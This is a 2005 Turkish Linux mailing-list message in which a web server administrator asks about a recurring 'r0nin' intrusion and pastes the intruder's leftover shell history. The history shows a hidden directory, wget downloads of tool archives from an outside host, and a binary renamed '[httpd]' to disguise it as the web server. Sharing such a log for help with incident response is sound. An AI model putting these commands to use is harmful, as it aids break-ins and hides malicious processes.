From: The RED (jdred@gmx.net)
Date: Mon 18 Apr 2005 - 13:48:40 EEST
/var/tmp dizininde .bash_history oluşmuş. Sunucudaki exploit bir shell
hesabı açıyor herhalde ve ev dizinini /var/tmp olarak veriyor. Normalde
hiçbir kullanıcının shell izni yok. (sunucu web sunucu)
/var/tmp/.bash_history dosyasının içeriği:
e
w
/sbin/ifconfig
w
cd /var/tmp/.hu
cd /var/tmp
mkdir .hu
cd .hu
wget powerlock.home.ro/newpas.tgz
wget powerlock.home.ro/newpass.tgz
tar zxvf newpass.tgz
mv newpass [httpd]
export PATH="."
[httpd]
----- Original Message -----
From: "The RED" <jdred@gmx.net>
To: <linux-sunucu@liste.linux.org.tr>
Sent: Monday, April 18, 2005 11:48 AM
Subject: [Linux-sunucu] r0nin
> merhaba. sunucuma bir süredir r0nin dadandi. daha önce temizlemistim
> yeniden
> /tmp/ dizini altina girmis. Daha önce de bu dizin altinda r0nin, brk gibi
> şeyler vardi silmistim ama bugün r0nin tekrar o dizinde.
> Internetten biraz arastirdim ama yeterli bilgiye rastlayamadim henüz.
> Nedir bu r0nin tam olarak? Apache ile ilgili bir açiktan bahsediliyor.
> Nasil
> bulasiyor? Etkileri (yol açabileceği şeyler) neler ve nasil tam olarak
> silinebiliyor? Bilen varsa lütfen yardimci olun.
>
>
--------------------------------------------------------------------------------
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu
_______________________________________________
Linux-sunucu mailing list
Linux-sunucu@liste.linux.org.tr
http://liste.linux.org.tr/mailman/listinfo/linux-sunucu